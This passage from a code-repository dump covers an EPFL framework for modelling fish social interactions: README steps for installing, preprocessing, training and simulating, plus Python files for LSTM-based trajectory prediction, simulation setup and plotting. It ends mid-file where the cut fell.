patterns observed in the real data.\n4. Plots to easily compare the results of steps 1, 2 and 3. \n5. **[Under development]** Behavioural tools that not only capture social interactions but behaviour as a whole along with intelligent integration in simulation. \n\n\n## Installation\n\n- Open your favourite terminal and clone this repository:\n\n ```shell\n git clone https://github.com/bpapaspyros/find.git && cd find\n ```\n\n To use some of our data-sets you can clone one of the following:\n\n ```shell\n git clone [email protected]:epfl-mobots/plos_one_experiments.git data/ring\n ```\n\n ```shell\n git clone [email protected]:epfl-mobots/preddl_2023.git data/open_50cm\n ```\n\n- **[Optional but suggested]** Create a virtual python environment:\n \n ```shell\n virtualenv -p /usr/bin/python3 venv\n ```\n\n Notice that *find* has been tested with **Python 3.9.7**. \n\n\n\n Once you have created the environment go ahead and enable it:\n\n ```shell\n source venv/bin/activate\n ```\n- Go ahead and install dependencies as follows: \n\n\n\n For the core functionality only **[TF2 should detect a GPU if available and CUDA is installed]** : \n \n ```shell\n pip install -e .\n ```\n\n Additional packages to install dependencies related to linting and plotting: \n \n ```shell\n pip install -e '.[test, plot]'\n ```\n\n\n## Pre-processing your data\n\nYou can use the available fish data to test this part or take a deeper look in the code and adapt your data and/or the code to go through this section. Before you process anything, take a look at the available options that the pre-processing script offers, as follows:\n\n```shell\npython -m find.utils.preprocess -h\n```\n\nFor example, you can go ahead and pre-process the Hemigrammus rhodostomus data provided by our partners at the Université Toulouse III - Paul Sabatier in France:\n\n```shell\npython -m find.utils.preprocess -p data/open_50cm/rummy/pair/ -f 'raw_positions*2G*.dat' --fps 25 -c 3 --toulouse --radius 0.25\n```\n\nThis should create a new folder at the current directory with the format `$hostname_$hour_$minute_$second`. 
Inside this folder you will find processed versions of your original data files along with a correspondence file letting you know which processed file corresponds to which raw file.\n\n\n## Train a model to reproduce the interaction dynamics observed in the processed data\n\nBefore you start training models, you can take a look at the available models and training options by invoking the help function:\n\n```shell\npython -m find.models.trainer -h\n```\n\nFor example, you can use a simple probabilistic LSTM structure as follows:\n\n```shell\npython -m find.models.trainer -p experiment_folder -t 0.12 -e 81 -d 1 -b 512 --model PLSTM\n```\n\nNotice that despite the `81` epoch limit, there are additional stopping criteria that you can edit by taking a look at `trainer.py`.\n\n\n## Simulations\n\nOnce you have a version of the model you can run simulations and already start plotting some results. The simulation module contains multiple options that you can see by invoking the following command:\n\n```shell\npython -m find.simulation.simulation -h\n```\n\nFor example, assuming you provided data with multiple individuals, let's say 2, then you can run a hybrid simulation (i.e., one replayed trajectory plus the model interacting) as follows:\n\n```shell\npython -m find.simulation.simulation -p <path to the experiment> -r <path to a reference file> -t <timestep> --exclude_index <id of the individual to be replaced by the model>\n```\n\nor run a completely virtual simulation (i.e., model VS model):\n\n```shell\npython -m find.simulation.simulation -p <path to the experiment> -r <path to a reference file> -t <timestep> --exclude_index -1 -i <number of timesteps to simulate>\n```\n\nFinally, there is an option that allows you to create simulations with more individuals than the original dataset to study the scalability of the system. For example, you can do the following:\n\n```shell\npython -m find.simulation.simulation -p <path to the experiment> -r <path to a reference file> -t <timestep> --exclude_index -1 -i <number of timesteps to simulate> --num_extra_virtu 4\n```\n\nthat would correspond to a simulation of 4 + the original number of individuals.\n"
},
{
"alpha_fraction": 0.5210084319114685,
"alphanum_fraction": 0.5334861278533936,
"avg_line_length": 36.04716873168945,
"blob_id": "ce8cda2b6cebfae1c9de3b3ee28ec98be47bef49",
"content_id": "566a5934b96fc5dd9f3d1f85bb6d65492a488dc5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3927,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 106,
"path": "/find/simulation/trajnet_functors.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\nfrom find.simulation.tf_nn_functors import CircularCorridor, _sample_valid_position, most_influential_individual, get_most_influential_individual\n\nimport torch\nfrom copy import deepcopy\n\n\nclass Trajnet_dir:\n def __init__(self, model, num_timesteps, args, num_neighs=1):\n self._lstm_pred = model\n self._model = self._lstm_pred.model\n self._num_timesteps = num_timesteps\n self._num_neighs = num_neighs\n self._selection = most_influential_individual[args.most_influential_individual](args\n )\n self._args = args\n # ! this is also very specific to the inputs we use and should be generalized\n self._cc = CircularCorridor(1.0, (0, 0))\n self._radius = 0.25\n self._offset = 1.0\n self._full_pred = [None, None]\n self._means = [None, None]\n self._stds = [None, None]\n\n def get_full_pred(self):\n return self._full_pred\n\n def get_means(self):\n return self._means\n\n def get_stds(self):\n return self._stds\n\n def __call__(self, focal_id, simu):\n individuals = simu.get_individuals()\n focal = list(filter(lambda x: x.get_id() == focal_id, individuals))[0]\n\n X = np.empty((0, 2))\n xy_f = focal.get_position_history()[-self._num_timesteps:, :]\n xy_f = xy_f + self._offset\n ind_idcs = self._selection(focal_id, individuals)\n\n for i in range(self._num_timesteps):\n X = np.vstack((X, xy_f[i, :]))\n for idx in ind_idcs[:self._num_neighs]:\n ind = individuals[idx]\n xy_n = ind.get_position_history(\n )[-(self._num_timesteps - i), :]\n xy_n = xy_n + self._offset\n X = np.vstack((X, xy_n))\n X = X.reshape(self._num_timesteps, self._num_neighs + 1, 2)\n\n xy = torch.Tensor(X)\n scene_goal = np.zeros(shape=(2, 2))\n scene_goal = torch.Tensor(scene_goal)\n batch_split = [0, X.shape[1]]\n batch_split = torch.Tensor(batch_split).long()\n\n modes = 1\n n_predict = 3\n multimodal_outputs = {}\n\n max_retries = 100\n retries = 0\n\n while True:\n normals, output_scenes = self._model(\n xy, scene_goal, batch_split, n_predict=n_predict)\n output_scenes = output_scenes.detach().numpy()\n normals = normals.detach().numpy()\n output_primary = output_scenes[-n_predict:, 0]\n output_neighs = output_scenes[-n_predict:, 1:]\n multimodal_outputs[0] = [output_primary, output_neighs]\n\n # decoder results\n num_tsteps = output_scenes.shape[0] // 2\n means = np.empty((0, 2))\n stds = np.empty((0, 2))\n sampled_pos = np.empty((num_tsteps, 2))\n\n for i in range(num_tsteps):\n means = np.vstack([means, output_scenes[-num_tsteps+i, 0, :]])\n stds = np.vstack([stds, normals[-num_tsteps+i, 0, 2:-1]])\n sampled_pos[i, 0] = np.random.normal(means[i, 0], stds[i, 0])\n sampled_pos[i, 1] = np.random.normal(means[i, 1], stds[i, 1])\n\n full_pred = deepcopy(multimodal_outputs[0])\n self._full_pred[focal_id] = full_pred[0] - self._offset\n self._means[focal_id] = means - self._offset\n self._stds[focal_id] = stds\n\n prediction = deepcopy(sampled_pos[0])\n prediction = prediction - self._offset\n\n # keep sampling until there is a valid prediction\n if self._cc.is_valid(self._cc.radius(prediction)):\n break\n else:\n if retries > max_retries:\n prediction = focal.get_position()\n break\n else:\n retries += 1\n\n return prediction\n"
},
{
"alpha_fraction": 0.6214575171470642,
"alphanum_fraction": 0.6288799047470093,
"avg_line_length": 31.933332443237305,
"blob_id": "6d86ab8cd9a5a1785c796ee04497d44b0af4bca3",
"content_id": "8d2d8a517e15a487601920f18c28d1cc4b7c86c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1482,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 45,
"path": "/examples/simu_example.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport sys\nimport argparse\nimport numpy as np\nfrom utils.features import Velocities\n\nsys.path.append('.')\n\nfrom simulation.fish_simulation import FishSimulation\nfrom simulation.replay_individual import ReplayIndividual\nfrom simulation.position_stat import PositionStat\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--path', '-p', type=str,\n help='Path to a trajectory file',\n required=True)\n parser.add_argument('--timestep', '-t', type=float,\n help='Simulation timestep',\n default=0.12, \n required=False)\n args = parser.parse_args()\n\n # loading pre-recorded trajectories\n trajectories = np.loadtxt(args.path)\n num_timesteps = trajectories.shape[0]\n print('Simulation will run for', num_timesteps, 'timesteps')\n\n # initializing the simulation\n simu_args = {\n 'stats_enabled': True,\n }\n simu = FishSimulation(args.timestep, num_timesteps, args=simu_args)\n \n # adding individuals to the simulation\n for i in range(trajectories.shape[1] // 2):\n p = trajectories[:, (i * 2) : (i * 2 + 2)]\n v = Velocities([p], args.timestep).get()[0]\n simu.add_individual(ReplayIndividual(p, v))\n\n # adding stat objects\n simu.add_stat(PositionStat(trajectories.shape[1], 'positions.dat', simu.get_dirname()))\n\n # run simulation\n simu.spin()\n"
},
{
"alpha_fraction": 0.6136114001274109,
"alphanum_fraction": 0.6169044971466064,
"avg_line_length": 23.62162208557129,
"blob_id": "17a377931d9513dcf47921fd952f448cb4ef2ef8",
"content_id": "9b2bfb554b5f1923a78649a45bb3631e1ac61f67",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 911,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 37,
"path": "/find/models/model_factory.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "import find.models.tf_models as tfm\n\nmodel_choices = {\n 'PLSTM': tfm.PLSTM,\n 'PLSTM_SHALLOW': tfm.PLSTM_SHALLOW,\n 'PLSTM_2L': tfm.PLSTM_2L,\n 'PLSTM_MULT_PREDS': tfm.PLSTM_MULT_PREDS,\n 'PFW': tfm.PFW,\n 'LCONV': tfm.LCONV,\n 'LSTM': tfm.LSTM,\n 'PLSTM_builder': tfm.PLSTM_model_builder,\n 'PFW_builder': tfm.PFW_model_builder,\n}\n\nbackend = {\n 'PLSTM': 'keras',\n 'PLSTM_SHALLOW': 'keras',\n 'PLSTM_2L': 'keras',\n 'PLSTM_MULT_PREDS': 'keras',\n 'PFW': 'keras',\n 'LCONV': 'keras',\n 'LSTM': 'keras',\n 'PLSTM_builder': 'keras',\n 'PFW_builder': 'keras',\n}\n\n\ndef available_models():\n return list(model_choices.keys())\n\n\nclass ModelFactory:\n def __call__(self, model_choice, input_shape, output_shape, args):\n return model_choices[model_choice](input_shape, output_shape, args)\n\n def model_backend(self, model_choice):\n return backend[model_choice]\n"
},
{
"alpha_fraction": 0.4940639138221741,
"alphanum_fraction": 0.5059360861778259,
"avg_line_length": 21.8125,
"blob_id": "e1d015a75923a43e37b0f7bbf32a9b8cdb88b465",
"content_id": "c9d73c726b09447f258842441905c78c4b15db5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1095,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 48,
"path": "/setup.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nfrom setuptools import setup, find_packages\n\n# extract version from __init__.py\nwith open('find/__init__.py', 'r') as f:\n VERSION_LINE = [l for l in f if l.startswith('__version__')][0]\n VERSION = VERSION_LINE.split('=')[1].strip()[1:-1]\n\n\nsetup(\n name='find',\n version=VERSION,\n packages=find_packages(),\n description='Fish INteraction moDeling framework.',\n # long_description=open('Readme.md').read(),\n author='Vaios Papaspyros',\n author_email='[email protected]',\n url='https://github.com/bpapaspyros/find',\n\n install_requires=[\n 'numpy',\n 'h5py',\n 'python-dateutil',\n 'keras==2.6.0',\n 'tensorflow==2.6.0',\n 'torch',\n 'tqdm',\n 'word2number',\n 'torch', # install pytorch and allow for extending find\n 'tqdm',\n ],\n extras_require={\n 'test': [\n 'pylint',\n 'autopep8',\n ],\n 'plot': [\n 'pandas',\n 'seaborn',\n 'scipy',\n 'matplotlib',\n 'pillow'\n ]\n },\n\n classifiers=[\n ]\n)\n"
},
{
"alpha_fraction": 0.5371270179748535,
"alphanum_fraction": 0.562109649181366,
"avg_line_length": 26.188678741455078,
"blob_id": "567f07db0d31bee144e53eed48eb1a1da386b979",
"content_id": "5b81b506cd2873bf7db3b76002ef3b91f45d3208",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2882,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 106,
"path": "/find/plots/common.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport seaborn as sns\n\nfrom matplotlib import gridspec\nimport matplotlib.pyplot as plt\nimport matplotlib.lines as mlines\nfrom matplotlib.colors import ListedColormap\n\nfrom itertools import cycle\nfrom pylab import mpl, rcParams, Rectangle, Circle\n\n_uni_pallete = sns.color_palette(\"bright\", n_colors=20, desat=.5)\n\n\ndef uni_palette():\n return _uni_pallete\n\n\ndef uni_colours():\n return sns.color_palette(uni_palette())\n\n\ndef uni_cycler():\n return cycle(uni_palette())\n\n\nuni_linewidth = 1.1\nfontsize = 11\n\nparams = {\n 'figure.dpi': 300,\n 'savefig.dpi': 300,\n 'lines.linewidth': uni_linewidth,\n 'font.size': fontsize,\n}\nrcParams.update(params)\n\nsns.set_style(\n \"whitegrid\",\n # \"darkgrid\",\n {\n 'axes.axisbelow': False,\n 'axes.edgecolor': '.8',\n 'axes.facecolor': 'white',\n 'axes.grid': True,\n 'axes.labelcolor': '.15',\n 'axes.linewidth': 1.0,\n 'font.family': [u'sans-serif'],\n 'font.sans-serif': [u'Arial',\n u'Liberation Sans',\n u'Bitstream Vera Sans',\n u'sans-serif'],\n 'grid.color': '.8',\n 'grid.linestyle': u'-',\n 'image.cmap': u'Greys',\n 'legend.frameon': False,\n 'legend.numpoints': 1,\n 'legend.scatterpoints': 1,\n 'lines.solid_capstyle': u'round',\n 'text.color': '.15',\n 'xtick.color': '.15',\n 'xtick.direction': u'in',\n 'xtick.major.size': 0.0,\n 'xtick.minor.size': 0.0,\n 'ytick.color': '.15',\n 'ytick.direction': u'in',\n 'ytick.major.size': 0.0,\n 'ytick.minor.size': 0.0,\n 'grid.linestyle': 'dotted',\n 'text.usetex': True,\n 'lines.linewidth': uni_linewidth,\n 'font.size': fontsize,\n })\n\n\nuni_lines = [\"-\"]\n\n\ndef uni_linecycler():\n return cycle(uni_lines)\n\n\nuni_pts = np.linspace(0, np.pi * 2, 24)\nuni_circ = np.c_[np.sin(uni_pts) / 2, -np.cos(uni_pts) / 2]\nuni_vert = np.r_[uni_circ, uni_circ[::-1] * 1.0]\nuni_open_circle = mpl.path.Path(uni_vert)\nuni_extra = Rectangle((0, 0), 1, 1, fc=\"w\", fill=False,\n edgecolor='none', linewidth=0)\n\nuni_v = np.r_[uni_circ, uni_circ[::-1] * 0.6]\nuni_oc = mpl.path.Path(uni_v)\n\nhandles_a = [\n mlines.Line2D([0], [0], color='black', marker=uni_oc,\n markersize=6, label='Mean and SD'),\n mlines.Line2D([], [], linestyle='none', color='black', marker='*',\n markersize=5, label='Median'),\n mlines.Line2D([], [], linestyle='none', markeredgewidth=1, marker='o',\n color='black', markeredgecolor='w', markerfacecolor='black', alpha=0.5,\n markersize=5, label='Single run')\n]\n\nhandles_b = [\n mlines.Line2D([0], [1], color='black', label='Mean'),\n Circle((0, 0), radius=1, facecolor='black', alpha=0.35, label='SD')\n]\n"
},
{
"alpha_fraction": 0.6287128925323486,
"alphanum_fraction": 0.6303630471229553,
"avg_line_length": 29.299999237060547,
"blob_id": "15644ca618bf4e4d1315292c5270055911901405",
"content_id": "4852932a0f51303bdbd22d4ed917a61e18744638",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 606,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 20,
"path": "/find/simulation/simu/stat/stat_base.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "class StatBase:\n def __init__(self, filename, dirname='', dump_period=-1):\n self._dirname = dirname\n self._filename = filename\n self._dump_period = dump_period\n\n def set_dirname(self, dirname):\n self._dirname = dirname\n\n def get_filename(self):\n return self._filename\n\n def get(self):\n assert False, 'You need to implement this function in a subclass'\n\n def save(self):\n assert False, 'You need to implement this function in a subclass'\n\n def __call__(self, simu):\n assert False, 'You need to implement this function in a subclass'\n"
},
{
"alpha_fraction": 0.6399999856948853,
"alphanum_fraction": 0.6399999856948853,
"avg_line_length": 10.461538314819336,
"blob_id": "77a638651067465bd9ef06a7524b5773eaec915c",
"content_id": "78fc5709d6e8684e001fab63596e1787abd23f23",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 150,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 13,
"path": "/find/plots/physiological/__init__.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "\nplot_dict = {\n}\n\n\nsource = 'physiological'\n\n\ndef available_plots():\n return list(plot_dict.keys())\n\n\ndef get_plot(key):\n return plot_dict[key]\n"
},
{
"alpha_fraction": 0.5596441626548767,
"alphanum_fraction": 0.5671249628067017,
"avg_line_length": 41.27350616455078,
"blob_id": "6ac02e61dfc08d0155693a49bc9b28a4095c72b5",
"content_id": "29647532275075da5b2d608edd5f498c698b3f07",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4946,
"license_type": "no_license",
"max_line_length": 154,
"num_lines": 117,
"path": "/find/simulation/simulation_factory.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "import os\n\nimport find.simulation.trajnet_functors as tnf\n\nimport find.simulation.tf_nn_functors as tfnnf\nfrom find.simulation.tf_nn_functors import get_most_influential_individual\nfrom find.simulation.fish_simulation import FishSimulation\nfrom find.simulation.replay_individual import ReplayIndividual\nfrom find.simulation.nn_individual import NNIndividual\nfrom find.simulation.tf_nn_functors import Multi_plstm_predict, Multi_plstm_predict_traj\nfrom find.simulation.position_stat import PositionStat\nfrom find.simulation.velocity_stat import VelocityStat\nfrom find.simulation.nn_prediction_stat import NNPredictionStat\n\nfrom find.utils.features import Velocities\n\nnn_functor_choices = {\n 'PLSTM': tfnnf.Multi_plstm_predict,\n 'PLSTM_SHALLOW': tfnnf.Multi_plstm_predict,\n 'PLSTM_2L': tfnnf.Multi_plstm_predict,\n 'PLSTM_MULT_PREDS': tfnnf.Multi_plstm_predict_traj,\n 'PFW': tfnnf.Multi_pfw_predict,\n 'LCONV': tfnnf.Multi_plstm_predict,\n\n 'trajnet_dir': tnf.Trajnet_dir,\n}\n\n\ndef available_functors():\n return list(nn_functor_choices.keys())\n\n\nclass SimulationFactory:\n def __call__(self, data, model, nn_functor, backend, args):\n if not os.path.exists(args.simu_out_dir):\n os.makedirs(args.simu_out_dir)\n\n if backend == 'keras':\n return self._construct_sim(data, model, nn_functor_choices[nn_functor], backend, args)\n elif backend == 'trajnet':\n return self._construct_sim(data, model, nn_functor_choices[nn_functor], backend, args)\n\n def _construct_sim(self, data, model, nn_functor, backend, args):\n pos = data\n vel = Velocities([pos], args.timestep).get()[0]\n\n # initializing the simulation\n # if the trajectory is replayed then -1 makes sure that the last model prediction is not added to the generated file to ensure equal size of moves\n iters = pos.shape[0] - \\\n args.num_timesteps if args.iterations < 0 else args.iterations\n\n simu_args = {'stats_enabled': True, 'simu_dir_gen': False}\n simu = FishSimulation(args.timestep, iters, args=simu_args)\n\n interaction_functor = None\n if 'LSTM' in args.nn_functor or 'trajnet' in args.nn_functor:\n interaction_functor = nn_functor(\n model, args.num_timesteps, args=args, num_neighs=args.num_neighs_consider)\n else:\n interaction_functor = nn_functor(\n model, args=args, num_neighs=args.num_neighs_consider)\n\n if iters <= 0:\n return None\n\n # adding individuals to the simulation\n for i in range(pos.shape[1] // 2):\n if args.exclude_index > -1:\n if args.exclude_index == i:\n simu.add_individual(\n NNIndividual(\n interaction_functor,\n initial_pos=pos[:(args.num_timesteps),\n (i * 2): (i * 2 + 2)],\n initial_vel=vel[:(args.num_timesteps),\n (i * 2): (i * 2 + 2)]\n ))\n else:\n simu.add_individual(ReplayIndividual(\n pos[:, (i * 2): (i * 2 + 2)],\n vel[:, (i * 2): (i * 2 + 2)]))\n else: # purely virtual simulation\n simu.add_individual(\n NNIndividual(\n interaction_functor,\n initial_pos=pos[:(args.num_timesteps),\n (i * 2): (i * 2 + 2)],\n initial_vel=vel[:(args.num_timesteps),\n (i * 2): (i * 2 + 2)]\n ))\n\n if args.exclude_index < 0:\n for _ in range(args.num_extra_virtu):\n simu.add_individual(\n NNIndividual(\n interaction_functor,\n initial_pos=pos[:(args.num_timesteps), 0:2],\n initial_vel=vel[:(args.num_timesteps), 0:2]\n ))\n\n # generated files have different names if the simulation is virtual or hybrid\n basename = os.path.basename(args.reference)\n if args.exclude_index < 0:\n gp_fname = args.simu_out_dir + '/' + \\\n basename.replace('processed', 'generated_virtu')\n else:\n gp_fname = 
args.simu_out_dir + '/' + basename.replace(\n 'processed', 'idx_' + str(args.exclude_index) + '_generated')\n gv_fname = gp_fname.replace('positions', 'velocities')\n\n # adding stat objects\n simu.add_stat(PositionStat(\n pos.shape[1] + args.num_extra_virtu * 2, gp_fname, dump_period=args.simu_stat_dump_period))\n simu.add_stat(VelocityStat(\n vel.shape[1] + args.num_extra_virtu * 2, gv_fname, dump_period=args.simu_stat_dump_period))\n\n return simu\n"
},
{
"alpha_fraction": 0.7194805145263672,
"alphanum_fraction": 0.7220779061317444,
"avg_line_length": 41.77777862548828,
"blob_id": "7cd5eeaef7e90373b226b326697a1ce77c7a5e83",
"content_id": "0c56c5b480c87fdd8dd6ce72460c2cfce587f967",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 385,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 9,
"path": "/find/simulation/fish_simulation.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "from find.simulation.simu.simulation.simulation import Simulation\nfrom find.simulation.simu.simulation.individual import Individual\n\n\nclass FishSimulation(Simulation):\n def __init__(self, timestep, num_iterations, args={'stats_enabled': False}):\n Individual.reset_ind_id()\n # TODO: super() is python 3 specific\n super().__init__(timestep, num_iterations, args)\n"
},
{
"alpha_fraction": 0.739382266998291,
"alphanum_fraction": 0.739382266998291,
"avg_line_length": 23.66666603088379,
"blob_id": "c1308f0345c054897c6034771f8d5d688e7c17f4",
"content_id": "f6d62872f64ca9c5c207eb8f5429f6b8f1f774c4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 518,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 21,
"path": "/find/plots/nn/__init__.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "from find.plots.nn import training_history\nfrom find.plots.nn import parameters_to_epoch\nfrom find.plots.nn import trajectory_prediction\nfrom find.plots.nn import training_curves\n\nplot_dict = {\n 'training_history': training_history.plot,\n 'parameters_to_epoch': parameters_to_epoch.plot,\n 'trajectory_prediction': trajectory_prediction.plot,\n 'training_curves': training_curves.plot\n}\n\nsource = 'nn'\n\n\ndef available_plots():\n return list(plot_dict.keys())\n\n\ndef get_plot(key):\n return plot_dict[key]\n"
},
{
"alpha_fraction": 0.5061728358268738,
"alphanum_fraction": 0.5404938459396362,
"avg_line_length": 34.21739196777344,
"blob_id": "fa4fb76c946b318f0d2cb3f925eeb6b7ce16ac0e",
"content_id": "c1cd15e94511642aa6362753ac94f8ae8cc5d1dc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4050,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 115,
"path": "/find/plots/dl_si_2021/occupancy_grids.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport glob\nimport argparse\n\nfrom find.utils.features import Velocities\nfrom find.plots.common import *\nimport find.plots.common as shared\n\nimport find.plots.spatial.grid_occupancy as go\n\n\ndef plot(exp_files, path, args):\n data = {}\n grids = {}\n for e in sorted(exp_files.keys()):\n pos = glob.glob(args.path + '/' + exp_files[e])\n if len(pos) == 0:\n continue\n data[e] = {}\n data[e] = []\n for p in pos:\n if e == 'Virtual (Toulouse)':\n f = open(p)\n # to allow for loading fortran's doubles\n strarray = f.read().replace(\"D+\", \"E+\").replace(\"D-\", \"E-\")\n f.close()\n num_ind = len(strarray.split('\\n')[0].strip().split(' '))\n positions = np.fromstring(\n strarray, sep='\\n').reshape(-1, num_ind) * args.radius\n else:\n positions = np.loadtxt(p) * args.radius\n data[e].append(positions)\n\n x, y, z = go.construct_grid(data, e, args)\n grid = {'x': x, 'y': y, 'z': z}\n grids[e] = grid\n\n fig = plt.figure()\n fig.set_figwidth(9)\n fig.set_figheight(7)\n gs = fig.add_gridspec(2, 1)\n gs.set_height_ratios([2.75, 1])\n\n gs_cbar = gs[1].subgridspec(1, 1)\n\n gs0 = gs[0].subgridspec(1, 2)\n gs00 = gs0[0].subgridspec(1, 1)\n gs01 = gs0[1].subgridspec(2, 2, hspace=0.15)\n\n ax0 = fig.add_subplot(gs00[0])\n ax1 = fig.add_subplot(gs01[0, 0])\n ax2 = fig.add_subplot(gs01[0, 1])\n ax3 = fig.add_subplot(gs01[1, 0])\n ax4 = fig.add_subplot(gs01[1, 1])\n ax_cbar = fig.add_subplot(gs_cbar[0])\n\n orig_cutoff = args.grid_cutoff_val\n # This was set to match the max among all grids for H. Rhodostomus\n args.grid_cutoff_val = 0.002\n\n ax0, cmesh = go.occupancy_grid(data, grids['Real'],\n fig, 'Control (CD)', ax0,\n args, pad=0.25, draw_colorbar=False)\n ax1, _ = go.occupancy_grid(data, grids['Virtual'],\n fig, 'HR-NNig', ax1, args, draw_colorbar=False)\n ax2, _ = go.grid_difference(grids,\n 'Real', 'Virtual',\n fig, ax2, args, draw_colorbar=False)\n\n ax3, _ = go.occupancy_grid(data, grids['Virtual (Toulouse)'],\n fig, 'ABC', ax3, args, draw_colorbar=False)\n ax4, _ = go.grid_difference(grids,\n 'Real', 'Virtual (Toulouse)',\n fig, ax4, args, draw_colorbar=False)\n\n cbar = fig.colorbar(cmesh, ax=ax_cbar, label='Cell occupancy (%)',\n location='top', extend='max', pad=0.3)\n cbar.ax.tick_params(rotation=30)\n\n ax0.text(-0.2, 1.07, r'$\\mathbf{A}$',\n fontsize=25, transform=ax0.transAxes)\n ax1.text(-0.2, 1.07, r'$\\mathbf{B}$',\n fontsize=25, transform=ax1.transAxes)\n ax2.text(-0.2, 1.07, r'$\\mathbf{C}$',\n fontsize=25, transform=ax2.transAxes)\n ax3.text(-0.2, 1.07, r'$\\mathbf{D}$',\n fontsize=25, transform=ax3.transAxes)\n ax4.text(-0.2, 1.07, r'$\\mathbf{E}$',\n fontsize=25, transform=ax4.transAxes)\n\n ax0.set_ylabel('y (m)')\n ax0.set_xlabel('x (m)')\n ax1.get_xaxis().set_ticklabels([])\n ax1.get_yaxis().set_ticklabels([])\n ax2.get_xaxis().set_ticklabels([])\n ax2.get_yaxis().set_ticklabels([])\n ax3.get_xaxis().set_ticklabels([])\n ax3.get_yaxis().set_ticklabels([])\n ax4.get_xaxis().set_ticklabels([])\n ax4.get_yaxis().set_ticklabels([])\n ax_cbar.get_xaxis().set_ticks([])\n ax_cbar.get_yaxis().set_ticks([])\n ax_cbar.axis('off')\n ax_cbar.set_visible(False)\n\n ax0.grid(linestyle='dotted')\n ax1.grid(linestyle='dotted')\n ax2.grid(linestyle='dotted')\n ax3.grid(linestyle='dotted')\n ax4.grid(linestyle='dotted')\n\n plt.tight_layout()\n plt.savefig(path + 'occupancy_maps.png', bbox_inches='tight')\n\n args.grid_cutoff_val = orig_cutoff # resetting this\n"
},
{
"alpha_fraction": 0.5029211044311523,
"alphanum_fraction": 0.5108730792999268,
"avg_line_length": 38.248409271240234,
"blob_id": "5979074e3afdb0209a13ccf2591e96998727feae",
"content_id": "c62157332d6d3c9d78bc7a8a0888fe19fa7e3841",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6162,
"license_type": "no_license",
"max_line_length": 166,
"num_lines": 157,
"path": "/find/plots/spatial/resultant_velocity.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport glob\nimport argparse\n\nfrom find.utils.features import Velocities\nfrom find.utils.utils import compute_leadership\nfrom find.plots.common import *\n\nfrom scipy.stats import norm, rv_histogram\n\n\ndef compute_resultant_velocity(data, ax, args, clipping_range=[0.0, 0.6]):\n lines = ['--', ':']\n linecycler = cycle(lines)\n new_palette = uni_palette()\n new_palette *= 3\n ccycler = cycle(sns.color_palette(new_palette))\n\n leadership = {}\n for k in sorted(data.keys()):\n p = data[k]['pos']\n v = data[k]['vel']\n leadership[k] = []\n for idx in range(len(p)):\n (_, leadership_timeseries) = compute_leadership(p[idx], v[idx])\n leadership[k].append(leadership_timeseries)\n\n labels = []\n for k in sorted(data.keys()):\n labels.append(k)\n leaders = leadership[k]\n rvel = data[k]['rvel']\n leader_dist = []\n follower_dist = []\n\n for idx in range(len(rvel)):\n leadership_mat = np.array(leaders[idx])\n num_individuals = rvel[idx].shape[1]\n for j in range(num_individuals):\n idx_leaders = np.where(leadership_mat[:, 1] == j)\n leader_dist += rvel[idx][idx_leaders, j].tolist()[0]\n follower_idcs = list(range(num_individuals))\n follower_idcs.remove(j)\n for fidx in follower_idcs:\n follower_dist += rvel[idx][idx_leaders, fidx].tolist()[0]\n\n ls = next(linecycler)\n print('Velocities', k)\n print('LF: ', np.mean(leader_dist+follower_dist),\n np.std(leader_dist+follower_dist))\n print('L: ', np.mean(leader_dist),\n np.std(leader_dist))\n print('F: ', np.mean(follower_dist),\n np.std(follower_dist))\n\n ccolour = next(ccycler)\n # ax = sns.kdeplot(leader_dist + follower_dist, ax=ax, color=ccolour,\n # linestyle'-', label=k, linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=clipping_range, bw_adjust=0.5, cut=-1)\n ax = sns.kdeplot(leader_dist, ax=ax, color=ccolour,\n linestyle='--', label='Leader (' + k + ')', linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=clipping_range, 